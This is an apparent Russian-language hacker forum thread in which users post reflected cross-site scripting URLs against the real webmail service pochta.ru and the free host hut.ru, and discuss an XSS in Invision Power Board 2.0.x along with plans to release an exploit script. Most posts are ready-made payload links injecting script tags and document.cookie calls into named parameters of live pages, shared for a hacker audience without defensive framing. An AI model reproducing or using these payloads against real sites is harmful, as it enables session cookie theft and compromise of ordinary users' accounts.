XSS почта.ру, hut.ru

1) Нашел на почта.ру вот

Code:

http://www.pochta.ru/info.php?lng=&mid="><script>alert('XSS by m0nzt3r');</script>

если ее ктото находил уже то извиняюсь...
2) и еше один на hut.ru (это бесплатный хостинг)

Code:

http://register.hut.ru/cgi-bin/sp.cgi?fqdn="<script>alert('XSS by m0nzt3r');</script>

=))
недаром говорят что все бесплатное бывает дыряво..

 

я на Ipb 2.0.4 нашел Xss пока сейчас пишу сплоит на него !
Думаю наднях будет релиз и видео

 

Во! молодец значит 2.0.4 тож дырявая..на чем пишешь сплойт и как далеко можно использовать эту багу?

 

на Xss сплоит????
Странно а сплоит для чего не понял?
Или он будет админа заманивать? =)

 

Morph, под сплойтом в данном случае имеется ввиду полноценный скрипт.

 

PinkPanther ага ты прав. Думаю на днях опубликую багу =)

 

А терь понял ступил малась =))
ИМХО.Но все же не сплоит тогда код уж.

 

Вообщето, и в 1.* и в 2.* изначально есть XSS. Вложеные теги.
http://antichat.ru/txt/IPB/index3.php

 

эээ Клез а я обрадовался ))))))) это когда в админке добавяешь форумы то в комментах к ним теги не фильтрируются =))) так как комменты можно писать из админки то следовательно для проведения хсс надо быть админом )) а если ты админ то нафиг тебе хСС?))))))))))) у меня прошло на 2.0.3 нуленой версии у Клеза на 2.0.4 наверно есть во всех версиях ))

 

http://www5.pochta.ru/list.php?id=N...ent.cookie%29%3C%2Fscript%3E&bt_create=%CE%EA

http://www3.pochta.ru/list.php?lng=en&id=N71e37161bc49873482fcf68b3e497f5&aid=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&rid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www10.pochta.ru/mailbox.php?lng=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&id=Nd558588a9be04bfdf2a54ea6ea0ce32

http://www10.pochta.ru/mailbox.php?id=Nd558588a9be04bfdf2a54ea6ea0ce32&chset=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www10.pochta.ru/info.php?sid=&lng=&mid=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www10.pochta.ru/regform.php?sid=3beff5fe76e261870e27716b82a73162&lng=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&rnd=%3Cscript%3Ealert(document.cookie)%3C/script%3E

 

а ты не подумал что мы не сможем это просмотреть=))))сессиЯ)

 

Там пофигу пройдет так что никаких сессий =)
Так что все путем =)
Все нормально смотриться!

 

Нифига, скрипт выполнится только если значение id
верное. А его уже не перехватишь...
Так что дырка абсолютно бесполезная.

 

хехе
Ну я же не говорил что ими мона что то угнать тема была XSS pochta.ru
Вот я и выложил а пасивыне или активные никто не спрашивал.

 

А почему здесь:
(document.cook ie)
В середине слова cookie стоит пробел?
А в других ссылках на XSS ОТ Морфа пробел не ставится?
Что-то с форумом?

 

Нет это случайно вышло в блокноте валялось вот и развалилось а так без пробела должено быть =)

 

Знаю, что без пробела Вот я написал без пробела, а получилось с пробелом !!!! Сам смотри ))) Чё за нах...???)))

http://www10.pochta.ru/mailbox.php?lng=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&id=Nd558588a9be04bfdf2a54ea6ea0ce32

 

Так задуманно =)